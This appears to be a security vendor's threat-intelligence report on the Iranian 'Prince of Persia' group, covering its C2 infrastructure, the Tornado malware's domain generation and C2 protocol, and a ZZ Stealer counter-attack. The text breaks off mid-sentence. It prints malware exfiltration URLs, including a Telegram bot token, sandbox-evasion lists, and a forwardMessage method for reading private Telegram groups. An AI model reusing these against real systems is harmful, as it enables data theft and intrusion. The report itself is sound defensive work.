{ "id": "f6952c7a-d797-4c13-9a70-4b401d33335a", "created_at": "2026-04-06T01:32:19.914762Z", "updated_at": "2026-04-10T03:36:22.914401Z", "deleted_at": null, "sha1_hash": "0320483934aa386688f962f27c809fb89ac15f87", "title": "An Update on the Prince of Persia Threat Actor | SafeBreach", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 14626877, "plain_text": "An Update on the Prince of Persia Threat Actor | SafeBreach\r\nBy Author:  Tomer Bar, VP Security Research, SafeBreach\r\nArchived: 2026-04-06 00:31:53 UTC\r\nOn December 18, 2025, we shared Part I of our most recent research project on the Iranian state-sponsored threat actor\r\nknown as “Prince of Persia.” SafeBreach Labs has followed this threat actor since 2019 and originally published research in\r\n2021 that presented evidence they had dramatically reinforced their operations security activities, technical proficiency, and\r\ntooling capabilities. \r\nHowever, for the next three years, there was no publicly identified activity from the group. Our research team continued to\r\nhunt for evidence based on a variety of anchors and patterns we defined. As a result, we were able to maintain\r\nunprecedented visibility into their malicious activity during this time. Our findings, which were included in Part I of our\r\nresearch, showed that the scale of Prince of Persia’s activities were more significant than we originally anticipated. Our\r\nresearch documented at least three active variants of Foudre and Tonnerre malware being used by the group, identified new\r\nC2 servers supporting their activities, uncovered the details of a Telegram group being used to exfiltrate victim data, and\r\nmore. \r\nIt didn’t take long before the threat actors behind the Prince of Persia responded to our latest publication—and we began\r\nPart II of our research to track their latest activities. Over a two week period, from December 19, 2025, to January 8, 2026,\r\nwe saw the group replace the Telegram user and all C2 servers we identified in our previous research, make changes to hide\r\nvictim heatmaps and cover their tracks, and attempt a potential strike-back at our researchers that revealed surprising\r\nparallels to a previously documented attack targeting open-source Python libraries. \r\nWe also noticed that the threat actor stopped maintaining its C2 servers on January 8 for the first time since we began\r\nmonitoring their activities. This was the same day a country-wide internet shutdown was imposed by Iranian authorities in\r\nresponse to recent protests, which likely suggests that even government-affiliated cyber units did not have the ability or\r\nmotivation to carry out malicious activities within Iran. On January 26, our visibility into the threat actor’s actions\r\nuncovered renewed activity as they began preparing new C2 servers. This led us to predict that the Iranian regime would\r\nsoon end the internet blackout, which correctly came to fruition one day later on January 27. We believe this provides solid\r\nproof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime and that we have the ability to\r\npredict its future actions using the visibility we have established into their cyber operations.\r\nIn the blog below, we first provide a high-level overview of the key findings and takeaways from this latest phase of\r\nresearch. Next, we share in-depth details about the threat actor’s activities since the publication of Part I of our research in\r\nDecember 2025. Then, we share our discovery and analysis of Tornado (named Tonnerre v50 in Part I of our research),\r\nwhich is the latest malware family used by the threat actor. We also document a potential attempt by the threat actor to infect\r\nour research machines with a two-stage attack using ZZ Stealer, which loads a custom variant of the StormKitty infostealer.\r\nNext, we highlight similarities between this malware and other previously documented infostealers, suggesting a potential\r\nlink to other threat actors. Finally, we provide two appendices that outline the ZZ Stealer decryption script and updated\r\nindicators of compromise (IoCs).\r\nKey Findings\r\nPart II of our research targeting the Prince of Persia threat actor group took place from December 19, 2025, to February 3,\r\n2026. During this time frame, we were able to maintain a level of visibility into the threat actor’s activity and infrastructure\r\nthat allowed us to: \r\nAchieve access to more than 2,000 exfiltrated files in this two week period, providing in-depth insights that show:\r\nAll C2 servers for all three versions of Foudre and Tonnerre were replaced. We found all three new, active C2\r\nservers including new DGA domain names. During the course of our research, one of the C2 servers was\r\nabandoned, leaving the remaining two C2 servers to serve all three versions of Foudre and Tonnerre. \r\nThe threat actor attempted to cover its tracks and hide the identity of victims or at least make the attribution\r\nmore difficult by:\r\nDeleting all past communication log files.\r\nChanging the backend C2 server code to omit storing the victim’s IP in the communication logs.\r\nChanging the filename of exfiltrated files to always include the general IP 0.0.0.0 instead of the real\r\nvictim’s IP address.\r\nUse of Tornado version 51, which is based on the Foudre family. We discovered and analyzed this variant,\r\nwhich includes dual C2 server protocols (HTTP and Telegram). It uses two different methods to generate C2\r\ndomain names: first, a new DGA algorithm and then fixed names using blockchain data de-obfuscation. This\r\nis a unique approach that we assume is being used to provide greater flexibility in registering C2 domain\r\nnames without the need to update the Tornado version.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 1 of 43\n\nA shift in the used attack vector. The threat actor is using a 1-day WinRAR vulnerability (likely CVE-2025-\r\n8088 or CVE‑2025‑6218) to extract Tornado to the startup folder. We assume they are leveraging this\r\nrelatively new public vulnerability in an attempt to increase their successful infection rate.\r\nThe communication logs for all Foudre and Tonnerre versions now include a new 256 byte array encoded with\r\nbase64 for each exfiltrated file. By adding RSA verification to any log being sent, the threat actor appears to\r\nbe adding protections to prevent other researchers—or malicious actors—from masquerading as victims to\r\nsend files. \r\nThe updatelist.txt file—which could be viewed by a browser and used a victim’s machine globally unique\r\nidentifier (GUID) to check for a new Tonnerre binary download from the C2 server—was cleaned and appears\r\nto be obsolete. Now, the php backend code—which cannot be viewed by a browser—checks if the machine\r\nname is a specific machine name and, if so, will redirect to a different Tonnerre file. Again, this appears to be\r\na protection added by the threat actor to conceal victim identities and/or make it more difficult for security\r\nresearchers to obtain newer versions of Tonnerre. \r\nThe non-bot user in the threat actor’s Telegram group was replaced and the original user was added to a new\r\nTelegram channel with three subscribers. The goal of this channel is still unknown, but we assume it is being\r\nused for command and control over victim’s machines.\r\nAchieve access to all past messages within the threat actor’s Telegram group that we identified in Part I of our\r\nresearch, despite the fact that the group is private and the bot was configured without permissions to read messages.\r\nAs part of this effort, we:\r\nAchieved access to all exfiltrated Foudre and Tonnerre files since February 2025, which included 118 files and\r\n14 shared links including commands sent to Tonnerre by the threat actor.\r\nIdentified a malicious ZIP file—masquerading as a victim’s exfiltrated file—in the last message that drops a\r\nZZ Stealer loader that loads a fork of the StormKitty infostealer and shares very similar source code. We\r\nbelieve this could mean that the threat actor was trying to strike back and infect our security researcher’s\r\nmachines.\r\nWe found a very strong correlation between the Prince of Persia and a threat actor who infected open-source Python libraries using a similar malware in early 2024, which was documented by Checkmarx.\r\nBoth used:\r\n1.  The exact counter strike technique as a reaction to the same Telegram forward message attempt.\r\n2. The same tools and attack chain: a very similar ZIP file and a similar lnk file that uses a similar\r\nPowerShell script to drop the exact same variant of the ZZ Stealer malware.\r\n3. The same process where ZZ Stealer downloads the second-stage malware using the same decryption\r\nkey from a page with the exact same unique name and parameters.   \r\nWe also found a weaker potential correlation between the Prince of Persia and the threat actor known\r\nas Educated Manticore. The attack vector using ZIP and lnk files and a PowerShell loader technique\r\nwas used by Educated Manticore and attributed to an Iranian state group focused on targeting Israel.\r\nThis similarity may indicate the sharing of data and malicious tools between Prince of Persia and\r\nEducated Manticore threat actors.\r\nUncover that there were no exfiltrated files and no newly registered DGA domain servers from January 8, 2026, to\r\nJanuary 24, 2026, indicating the threat actor was likely impacted by the internet shutdown in Iran. \r\nIdentify renewed activity on January 26, 2026, as the threat actor began preparing new C2 servers, suggesting the\r\nimpending end of the blackout. As we predicted, the blackout ended on January 27, providing what we believe to be\r\nstrong proof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime.\r\nRecommend that organizations take the following steps to protect themselves against the techniques used by the\r\nPrince of Persia:\r\nEnsure their security controls are updated to protect against the IoCs provided in Appendix B\r\nMonitor for any unusual Telegram traffic\r\nEnsure their operating systems are fully updated\r\nThreat Actor Activity Since Part 1 Research Publication\r\nSince December 18, when Part I of our Prince of Persia research was published, the threat actor has been very active. On\r\nDecember 21, they created a new C2 server 45.80.148.249, which works in parallel to the existing 45.80.148.195. The threat\r\nactor registered a new C2 domain name: uiavuflyjqodj.conningstone.net.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 2 of 43\n\nA second C2 server domain name uiavuflyjqodj.hbmc.net was also created on December 21—it initially resolved to\r\n45.80.148.195, but was modified to resolve to 45.80.148.249 on December 25.\r\nUsually when the threat actor replaced a C2 server, they copied the original C2 server and abandoned the original C2 server.\r\nThis time, however, the new C2 server works in parallel with the original one, and some of the settings were changed. For\r\nexample the blk.lst file was modified in C2 server 45.80.148.249 to allow the attacker’s machine to send files to the victim’s\r\nexfiltration folder instead of the protected blkb folder. This means that we have the ability to easily download the attacker\r\nmachine’s files—this appears to be purposeful but the motivation is not entirely clear. Here we can see the difference in the\r\nblkb file of the .195 and .249 servers:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 3 of 43\n\nThe threat actor also changed the backend code to hide the IP of the victim’s machine and replace it with 0.0.0.0. This is a\r\ntrial to make it difficult to correlate each victim file to the relevant victim’s machine. They also committed this change to the\r\nolder Tonnerre version 17 server (45.80.148.35) on December 28.\r\nIn addition, all the victim’s communications files were deleted (from folder f) and the new format of the communication file\r\nwas modified. The new file content does not include the IP of the victim’s machine; instead it seems to include base 64\r\nencoding of 256 bytes. It may be the RSA signature file encrypted with the public key used to encrypt each file. Up until\r\nnow the same file was used to encrypt each file. \r\nAlso on December 28, the older C2 server for Tonnerre versions 12-16 (http://92c5d3b3.ddns.net) stopped resolving to\r\n45.80.148.35. Later that day, the threat actor replaced the C2 server 45.80.148.35 with a new C2 server for both Foudre and\r\nTonnerre. The domain names lklptttt.space and onnmuoru.privatedns.org started resolving to a new C2 server 45.80.149.3.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 4 of 43\n\nWe found that the Tonnerre v17 domain name noonrpxv.privatedns.org resolved to the new C2 server 45.80.149.3. The\r\nTonnerre v12 domain name 26edd0a4.ddns.net resolved to the new C2 server 45.80.149.3 as well.\r\nThe updatelist.txt file was also cleaned and appeared to be obsolete:\r\nInstead the php backend code checks if the machine name is a specific machine name. If so, it was redirected to a different\r\nTonnerre file: t00017u14.dat. The file does not exist at the time of the check.\r\nIf the machine’s Globally Unique Identifier (GUID) was a specific GUID, it was redirected to a different Tonnerre file:\r\nt00017u3.tmp.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 5 of 43\n\nThreat Actor C2 Preparation Predicts End of Internet Blackout\r\nThe threat actor became dormant on January 8, 2026, which was the beginning of the internet blackout in Iran. After three\r\nweeks of monitoring, we discovered new activity on January 25, 2026. The threat actor registered two new fixed domain\r\nnames for the Tonnerre v.12-16 and Foudre v.34:\r\nf13.ddnsking.com – Tonnerre fixed domain resolving to C2 server 45.80.149.3\r\nt13.ddnsking.com – Foudre fixed domain resolving to C2 server 45.80.149.3\r\nThe threat actor also registered a new DGA domain for Tonnerre: joqoqwtu.privatedns.org (generated by the DGA \r\nFTS12026151). They also registered a Foudre DGA domain: klnptruu.space (generated by the DGA LOS1202615). With the\r\nthreat actor preparing the C2 servers, we believed it was an indication that the internet blackout may end the following\r\nweek.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 6 of 43\n\nOn January 25, the threat actor also registered two domain names: szzqwggurg.hbmc.net and szzqwggurg.conningstone.net,\r\nwhich resolve to the C2 server 45.80.148.249.\r\nWhile there had been no new victim exfiltrated files since January 8, on January 26 at 10:00 am (GMT +2), the first Foudre\r\nvictim’s machine started to exfiltrate data.\r\nThe internet blackout indeed ended a day later on January 27, 2026, proving our prediction correct. The nation state threat\r\nactor had internet connectivity two days prior to the end of the blackout and used it to prepare the C2 servers, which was an\r\nindication that the Iranian regime intended to end the blackout soon.\r\nWe believe this is additional proof that the Prince of Persia is a state-sponsored threat actor operated by the Iranian regime\r\nand that we have a unique ability to predict its actions using our visibility into their cyber operations.\r\nTornado v51 Analysis\r\nThe Infection Vector\r\nThe threat actor uses an archive exploit, which drops an AudioService.exe file to the startup folder. The exploit is probably\r\nCVE-2025-8088 or a similar vulnerability CVE‑2025‑6218. We believe this was likely in response to a change Microsoft\r\nmade in the macro security settings of Office, which made it less valuable as an attack vector. The threat actor likely took\r\nthis relatively new public vulnerability as an opportunity to improve their infection rate.\r\nIt was uploaded to Virus Total from India and Germany, which may indicate the victim countries:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 7 of 43\n\nThe file 5db4ed7d07ab028ab6ceba8efec5f667d86a419020d2a8c86e90a3125aa31bb9 masquerades as a doc file named\r\ntozihat.doc, but it’s actually an SFX file.\r\nThe file AuthFWSnapin.dll uses the name “Tornado version 051” for the malware in the exfiltrated collected data. It installs\r\nthe second phase malware (similar to Tonnerre) with password: Hcudhl3hcbgQdpnr3.\r\nThe DGA\r\nThere are two methods for Tornado to find its C2 servers. One is named “manual;” the other is named “active” and is based\r\non blockchain data. This is a unique approach that we assume is being used to provide flexibility in registering C2 domain\r\nnames—either fixed or weekly domain names—using DGA without the need to update Tornado with a new version to\r\nswitch between the options.\r\nManual DGA Method\r\nThe manual DGA is selected if the internet is not accessible when a check is completed via an HTTP GET request to\r\namazon.com.\r\nThe DGA includes a new algorithm with two phases: \r\n1. The first phase takes the prefix \u003cyy\u003e\u003cm\u003e\u003cweek number\u003eG\u003c0-11\u003e for Tornado\\Foudre and \u003cyy\u003e\u003cm\u003e\u003cweek\r\nnumber\u003eF\u003c0-11\u003e for Tornado\\Tonnerre and encodes it to base32.\r\n2. The second phase takes the base32 DGA as input and transforms it using the custom ALPHABET\r\n“otdhpgaurxyvszmqlwckbfniej”  + \u003ctld\u003e. tld is one of .site, .ix,tc, hbmc.net.\\\r\nIndeed the DGA domain name during that week was tegfxbnk.site.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 8 of 43\n\nThis part generates eight-character domain names. If no registered domain is available, the DGA prefix is added with a\r\nnumber between 0-11, as seen here:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 9 of 43\n\nWe were able to develop code that predicts all Tornado-generated domain names, both for the Tornado/Foudre binary we\r\nhave and also for the Tornado/Tonnerre binary we do not. The DGA is not just \u003cYY\u003e\u003cMM\u003e\u003cweek number\u003e. Instead, it is\r\nactually  \u003cYY\u003e\u003cMM\u003e\u003cweek number\u003e\u003cLETTER\u003e\u003cnumber between 0-22\u003e. Tornado\\Foudre uses G as the letter and\r\nTornado\\Tonnerre uses F as the letter.\r\nActive DGA Method\r\nIf the internet is accessible and the settings “BlockMethodActived0” is set:\r\nTornado will connect to https://blockchain.info/rawaddr/1HLoD9E4SDFFPDiYfNYnkBLQ85Y51J3Zb1 and download and\r\nread blockchain data. It searches for all the “scriptpubkey” values and then tries to deobfuscate the hex string under\r\nOP_RETURN OP_PUSHBYTES values. If the output is a non-alphabet output, then it moves to the next “scriptpubkey”\r\nvalue. When it gets to deobfuscate this record:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 10 of 43\n\n“vout”:[{“scriptpubkey”:”6a126f6266636570786f6478667579652e687875\r\nscriptpubkey_asm”:”OP_RETURN OP_PUSHBYTES_18 6f6266636570786f6478667579652e687875\r\nscriptpubkey_type”:”op_return\r\nValue”:0}\r\nThe bold hex string is “obfcepxodxfuye.hxu” which then deobfuscates to the final domain name: dnsbroadcaster.lat. This\r\nindeed resolved in the past to a C2 server.\r\nAnother obfuscated domain is svyeahjfu.pbhjby, which was received from the record:\r\n“vout”:[{“scriptpubkey”:”6a107376796561686a66752e7062686a6279″,\r\n“scriptpubkey_asm”:”OP_RETURN OP_PUSHBYTES_16\r\n7376796561686a66752e7062686a6279″,”scriptpubkey_type”:”op_return”,”value”:0}\r\nIt is deobfuscated to the final domain name querylist.online using this deobfuscation algorithm.\r\nIndeed both obfuscated domains were deobfuscated as expected:\r\nThe domain name querylist.online was previously registered in January 2025. It was not generated with a DGA and didn’t\r\nexpire after a week like the other domain names. This allows the threat actor to download files from the C2 server to their\r\nmachines in Iran using a fixed domain name. First, it was resolved to the C2 server 45.80.149.100. \r\nOn December 31, the threat actor revived this domain name and changed the resolution to C2 45.80.148.195. This indicates\r\nthat Tornado started sooner than we originally thought—between December 2024 and January 2025. The .195 server was\r\nabandoned finally at the beginning of 2026 and querylist.online is no longer responsive. \r\nIf the settings “BlockMethodActived0” was not set, the file mand.tpm (probably stands for MANual Domain) is read. This\r\nfile probably contains the DGA domain name. It is extracted from the “Constant” field. In addition, the field\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 11 of 43\n\n“forceKeyCheck” is checked and, if it appears, it will download the signature file to verify that the domain is a verified C2\r\nserver.\r\nExamples of  HTTP requests to the C2 server:\r\nhttp://whppczunsijn.site/?\r\na=k\u0026d=25350\u0026v=051\u0026c=XC64ZB\u0026i=03845cb8%2D7441%2D4a2f%2D8c0f%2Dc90408af5778\u0026t=2025%2D12%2D16%2D%2D14%2D41%2\r\nhttp://hkdhhwsafvnef.site/?\r\na=k\u0026d=25350\u0026v=051\u0026c=XC64ZB\u0026i=03845cb8%2D7441%2D4a2f%2D8c0f%2Dc90408af5778\u0026t=2025%2D12%2D16%2D%2D14%2D40%2\r\nTornado Communication with the C2 Server\r\nOnce the C2 domain server is generated using one of the DGA methods above, it starts to communicate with it. Tornado\r\nsupports four C2 servers’ actions signaled by the “a” parameter value:\r\n1. Tornado’s HTTP request to download and execute structure: \r\nhttp://hkdhhwsafvnef.hbmc.net/?a=d1\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, d1 – download and execute Tonnerre\r\nc = Victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nIf the correct machine GUID is provided, then the C2 server redirects to a file\r\nhttps://szzqwggurg.hbmc.net/download/tsetup5.dat, which did not exist at the time of our analysis.\r\n2. Tornado’s HTTP request to download and execute (signature file download) structure: \r\nhttp://hkdhhwsafvnef.hbmc.net/?a=d2\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, d2 – download Tonnerre signature file\r\nc = Victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\n3. Tornado’s HTTP request to verify that the domain is a verified C2 server structure:\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=k\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, k – key\r\nc = Victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nresults in a redirect to download the signature file. For example: http://szzqwggurg.hbmc.net2632.sig\r\n4. Tornado’s HTTP request for system info collection exfiltration structure:\r\nhttp://hkdhhwsafvnef.hbmc.net/?a=s\u0026c=\u003ccomputer name\u003e\u0026i=\u003cMachine GUID\u003e\u0026t=\u003ctimestamp\u003e\r\na = action, s – sysinfo\r\nc = Victim’s computer name\r\ni = victim’s machine GUID\r\nt = timestamp\r\nresults in a redirect\r\nTelegram-Based Command \u0026 Control\r\nIf the settings TelegramSendMethodActived0 are set, Tornado will use the Telegram bot API for sysinfo exfiltration, using\r\nthe sendDocument function:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 12 of 43\n\nCommands are received using the getupdates bot API functionality:\r\nThe URL of the C2 server second phase malware file is extracted from the “text” field. It verifies that the chat ID is the\r\nthreat actor’s Telegram group and that the machine GUID value sent is the machine GUID of the machine Tornado is\r\nrunning on.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 13 of 43\n\nIf so, it will download and execute the second phase malware from the URL received.\r\nTornado Installer\r\nThe second executable file in the SFX under the temp folder is reg7989.dll. This file uses mutex named TornadoInstaller.\r\nThe name is indicative, as this file serves as an installer by calling the export function FC.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 14 of 43\n\nIt checks if the Avast is not installed, creates a scheduled task for persistence, and executes the Tornado main dll.\r\nTornado: Analysis of Telegram Group Content\r\nNew Telegram Users \u0026 Channels\r\nOn December 19, 2025, just one day after the publication of our first research article, the threat actor removed the Telegram\r\nuser we had identified—@ehsan8999100—from the Telegram group sarafraz, which was used for command and control of\r\ntheir victims. A new user—@Ehsan66442—had been added in its place.\r\nHowever, this user, like the original user, is just a member that lacked administrator permissions.\r\nAs before, the bot member of the Telegram group still doesn’t have permissions to read the group’s chat messages.\r\nOn December 21, the original user @ehsan8999100 was added to a new Telegram channel named Test that had three\r\nsubscribers.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 15 of 43\n\nThe included link t.me/ehsan8999100 leads to a channel with empty messages. \r\nThe channel indeed includes the creator and three subscribers as seen below:\r\nThe channel was also configured to disallow channel member listing:\r\nCapturing Telegram Group Messages \u0026 Exfiltrated Files\r\nOn December 23, we were approached by an individual identified as “Monitoring-Circuit.” They defined themselves as a\r\nsecurity researcher and provided us with a public tool that had the ability to extract previous and future messages from the\r\nthreat actor’s Telegram group that we shared in our original research. They also provided files and messages he captured\r\nusing this tool.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 16 of 43\n\nOn December 24-25, we analyzed the tool and found out that a simple and single Telegram bot API was required. We then\r\ndeveloped our own tool that iterates this bot API, which resulted in our ability to capture all the group’s historic messages\r\nand files and three completely new files exfiltrated in real time. Later, we found out that this technique has been documented\r\nsince 2019—see here and here for examples.\r\nThe Technique \r\nWe were surprised to see this technique work in action, even though it’s a known technique. First, let’s recap the threat actor\r\ngroup’s settings. The group is private, and the bot is not an administrator and does not have access to messages:\r\nWe can see that indeed the group is empty of messages:\r\nThe Telegram bot API provides an interesting function called forwardMessage. The documentation from the official site can\r\nbe found here.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 17 of 43\n\nThree parameters are required:\r\nFrom_chat_id: The threat actor chat group_id\r\nChat_id – research_chat_id: Our own chat group_id where the bot added us\r\nMessage_id: The individual IDs of each message within the group; we knew this parameter was an integer and\r\ndecided to begin with the number 1 and move onwards.\r\nThe default settings of Telegram allow forwarding. In order to disable this technique on legitimate private Telegram\r\naccounts, users should enable Content Protection by selecting ”Restrict saving content” as seen below.\r\nWhat was even more important is that on default settings, the bot could forward past messages. As noted earlier, we knew\r\nthe message_id parameter was an integer, so we iterated on the message_id beginning with 1 and moving onwards. We were\r\nable to get 118 files and 14 shared links.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 18 of 43\n\nThe first messages from the threat actor were from February 16, 2025, which is exactly four days after the first known\r\nFoudre v50 C2 domain name (ejjnhkucbw.ix.tc) was registered and then resolved to IP 45.80.149.100. This C2 was also\r\nused as an SSL certificate valid from February 5, 2025. The first few messages seem like a test, so we believe this is the first\r\nmessage sent.  \r\nThe first Foudre victim’s exfiltrated file was sent on February 20, 2025, and became active daily for a week between March\r\n17 and March 24, 2025. The Foudre file names use the format: tg\u003cyymmddhhmm\u003e.tmp\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 19 of 43\n\nAfter that, there were no exfiltrated files for four months. Tonnerre files were exfiltrated from August 1, 2025, to September\r\n5, 2025, which is exactly a day after the first known Tonnerre v50 C2 domain name (xjhdvkoszwdpt.privatedns.org) was\r\nregistered and resolved to IP 45.80.148.124. This C2 was also used as an SSL certificate valid from July 31, 2025. \r\nThis means that there were probably no other C2 servers that were active and missed in our original research report between\r\nApril and August 2025. Periods of inactivity are not common for this threat actor, but this particular time of dormancy may\r\nbe explained by the escalation in tensions between Iran and Israel that began in the middle of April 2025 and ended in the\r\n12-days war in June 2025.\r\nThe Tonnerre file names use the format: ftg\u003cyymmddhhmm\u003e.tmp. The ftg portion probably stands for Files TeleGram.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 20 of 43\n\nThe files were exfiltrated from two different victims. At least one of them was an attacker’s test machine.\r\nOn March 24, 2025, an encoded command was sent to a victim, which probably means they downloaded the d1.exe from the\r\nC2 domain name tegfxbnk.site (this domain resolved to 45.80.149.100) and the SSL certificate was valid between February\r\n16 and May 17, 2025. \r\nThe domain and C2 server are no longer available, so we haven’t achieved access to the d1.exe file. Another command was\r\nsent just before the above command to download this FlashFXP setup file.\r\nThis file is still available to download:\r\nSha256: 631AE7074649A665D62AC6FC940D203EFF715C88B4B57EE46865286607909231\r\nIt is a Windows FTP Client software developed and signed by OpenSight Software LLC, which seems like a benign installer.\r\nIt might have been used as a test before downloading the probable malware file d1.exe.\r\nZZ Stealer Malware: A Strike-Back Attempt\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 21 of 43\n\nThe messages stopped on September 6, 2025, for a month. Then, on October 13, 2025, one last message was forward:\r\nAt first glance, this message seemed like an exfiltrated victim file, but it was actually a malicious file that was potentially\r\nsent to infect our analysis machine. The malware installs itself by running a PowerShell script that decodes the executable\r\nusing XOR with 0x44 and executes it. \r\nThe executable is ZZ Stealer malware version 3.81. The malware is a .net binary and all strings are encrypted. A screenshot\r\nof a decryption tool, which can decrypt single or multiple encrypted strings embedded in the malware, is included below.\r\nThe code is attached in the Appendix.\r\nFrom this point, we can’t guarantee that the Prince of Persia threat actor is using ZZ Stealer and the 8==3 Storm Kitty\r\nmalware as part of its arsenal, but since it tried to strike back at us, we are sharing the detailed analysis of the full attack\r\nchain.\r\nThis malware was already analyzed here. I verified that this variant is similar—below is a summary of the analysis of the\r\nmain functionality:\r\nThe malware first implements various anti-analysis checks. If it detects a risk, it will sleep for a random amount of time and\r\nthen terminate itself:\r\n1. Machine name is not of a known sandboxes\r\nBUXF-O02J2Q,JACOCOOK,JOHN-PC,ABBY-PC,USER-PC,AZURE-PC,GREFRANKLI,LISA-PC\r\n2. User names is not of a known sandboxes\r\nabby,IT-ADMIN,Paul Jones,WALKER,Sandbox,timmy,sandbox,sand box,maltest,malware,virus,JohnDoe,HAL9TH,John\r\nDoe,Emily,CurrentUser,test,george,Anna,ss\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 22 of 43\n\n3. File does not exist – %USERPROFILE%\\Pictures\\My Wallpaper.jpg\r\n4. hosting / datacenter / cloud (implemented but not used) – check if HTTP GET to “https://ip-api.com/line/?fields=hosting”\r\ndoes not return “True”\r\n5. Research tool’s processes doesn’t exist (not used):\r\nPythonw.exe,ollydbg.exe,processhacker.exe,tcpview.exe,autoruns.exe,de4dot.exe,ilspy.exe,dnspy.exe,autorunsc.exe,filemon.exe,procmon.exe,regmon.exe\r\n6. Research tool’s files don’t exist (not used):SbieDll.dll,SxIn.dll,Sf2.dll,snxhk.dll,cmdvrt32.dll\r\n7. Microsoft Hyper-V checks via checking if the MAC address begins with 00:15:5D:00:B2\r\nZZ Stealer appears to be a first-stage malware (like Foudre) that first collects environmental data, screenshots, and\r\nexfiltrates all desktop files. In addition, upon receiving the command “8==3” from the C2 server, it will download and\r\nexecute the second-stage malware also named by the threat actor as 8==3.\r\nA very similar strike-back attempt at a security researcher was documented in this Checkmarx article from the beginning of\r\n2024. While the C2 server IP is different, the name of the PHP file is the same: upwawsfrg.php. And the ZIP file, which\r\ndecoded the executable malware, is similar using 0x33 instead of 0x44 as the XOR byte.\r\nBelow is a screenshot from the case from 2024, which is very similar to our Telegram group ZIP file. The name of the file\r\nfollows a similar zip file format: \u003cuserName\u003e-\u003ccomputerName\u003e-\u003cdate\u003e.zip. And the body of the message is exactly the\r\nsame format.\r\nWe were able to verify that the counter attack documented by Checkmarx is actually a previous version of ZZ Stealer. This\r\nvariant named by the threat actor as “AB” uses the exact same decryption key, IV and salt as our new “8=3 variant” to\r\ndecrypt its own configuration. It also uses the “8=3” C2 server commands that will be detailed in the next section. \r\nThe “AB” variant of ZZ Stealer downloads a second-stage encrypted binary from the C2 server using an HTTP GET request\r\nto zd=1 and uses a different AES key to decrypt it: ae$tcgtAcoRT8441. The second-stage malware is not StormKitty, but\r\ninstead used an AB Metasploit-generated payload connecting to C2 server 104.248.194.233 on port 443. However, we found\r\ntwo other AB variants that download and execute the Monkey variant of StormKitty. \r\nWe believe this is a strong indication that suggests a link between the Prince of Persia and the threat actor behind the\r\ntargeting of open-source Python libraries documented by Checkmarkx. Both used:\r\n1. The exact counter strike technique as a reaction to the same Telegram forward message attempt.\r\n2. The same tools and attack chain: a very similar ZIP file and a similar lnk file that uses a similar PowerShell script to\r\ndrop the exact same variant of the ZZ Stealer malware.\r\n3. The same process where ZZ Stealer downloads the second-stage malware using the same decryption key from a page\r\nwith the exact same unique name and parameters. \r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 23 of 43\n\nThe StormKitty 8==3 file downloaded and executed by the ZZ Stealer in memory exfiltrates files to\r\nhttps://api.telegram.org/bot7033932802:AAGEIhL9e0lyUi0vjZnRy3PcwnKJPhSCFWQ/getchat?chat_id=1126217452\r\nThe group is still active and operated by a user named N3cro M4ncer. \r\nThe bot exfiltrating victim’s files to the Telegram group is d00m3rz_bot.\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 24 of 43\n\nWe were able to forward the first message from the operator sent on May 14, 2024. At first, we did not see any exfiltrated\r\nfiles. We executed the malware in our lab and in some public sandboxes and got the following exfiltrated files.\r\nEach report is an encrypted ZIP file; the filename is the hardware ID (HWID) of the victim’s machine. The content of the\r\nZIP file is split into directories of exfiltrated data. For example the report looks like this:\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 25 of 43\n\nBelow is the relevant function in the source code of ZZ Stealer that reproduced it. The only single difference is that in ZZ\r\nStealer, the first line is “🙈 8==3 – Report*”  instead of “😹 StormKitty- Report*”. 8==3 is a common ASCII-style\r\nhttps://www.safebreach.com/blog/prince-of-persia-part-ii/\r\nPage 26 of 43\n\nemoticon used as a phallic symbol and used in the ZZ Stealer code as commands from the C2 server. \r\nMoreover, the typelibguid is the same in both ZZ Stealer and StormKitty: a16abbb4-985b-4db2-a80c-21268b26c73d. In\r\naddition, the keylogger, banking, and crypto services are identical. Below is the screenshot of ZZ Stealer:\r\nAnd here are the exact same strings in StormyKitty 